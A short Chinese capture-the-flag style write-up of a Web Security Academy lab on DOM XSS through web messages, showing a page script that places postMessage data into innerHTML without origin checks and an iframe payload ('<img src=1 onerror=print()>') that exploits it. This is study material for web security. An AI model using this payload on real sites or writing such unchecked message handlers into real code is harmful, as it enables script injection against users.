CTF-WEB: 利用Web消息造成DOM XSS

如果索引中有类似如下代码

js 复制代码
<!-- Ads to be inserted here -->
<div id='ads'>
</div>
<script>
    window.addEventListener('message', function(e) {
        document.getElementById('ads').innerHTML = e.data;
    });
</script>
  • 这行代码的作用是将接收到的消息内容(e.data)设置为 id'ads' 的元素的 HTML 内容

那么在受害者段执行如下代码会导致DOM污染

html 复制代码
<iframe src="https://YOUR-LAB-ID.web-security-academy.net/" onload="this.contentWindow.postMessage('<img src=1 onerror=print()>','*')">

参考

实验:使用 Web 消息的 DOM XSS |网络安全学院

相关推荐
witkey_ak98962 小时前
网安面试题收集(1)
网络安全
网安INF21 小时前
【论文阅读】-《SparseFool: a few pixels make a big difference》
论文阅读·人工智能·深度学习·网络安全·黑盒攻击
介一安全21 小时前
【Web安全】转义字符注入?转义也会失效的SQL注入
web安全·网络安全·安全性测试·sql注入
网安INF1 天前
【论文阅读】-《Sparse Adversarial Attack via Perturbation Factorization》
论文阅读·人工智能·计算机视觉·网络安全·黑盒攻击
lingggggaaaa1 天前
小迪安全v2023学习笔记(九十七天)—— 云原生篇&Kubernetes&K8s安全&API&Kubelet未授权访问&容器执行
java·笔记·学习·安全·网络安全·云原生·kubernetes
余防1 天前
代码审计
安全·web安全·网络安全
Whoami!1 天前
4-8〔O҉S҉C҉P҉ ◈ 研记〕❘ WEB应用攻击▸命令注入漏洞
网络安全·信息安全·oscp·命令注入攻击
盛满暮色 风止何安1 天前
网络安全设备 防火墙
服务器·网络·网络协议·计算机网络·安全·web安全·网络安全
合作小小程序员小小店2 天前
Web渗透之一句话木马
web安全·网络安全·安全威胁分析·安全架构·安全性测试
源文雨2 天前
MacOS 下 Warp ping 局域网设备报错 ping: sendto: No route to host 的解决方法
运维·网络协议·安全·macos·网络安全·ping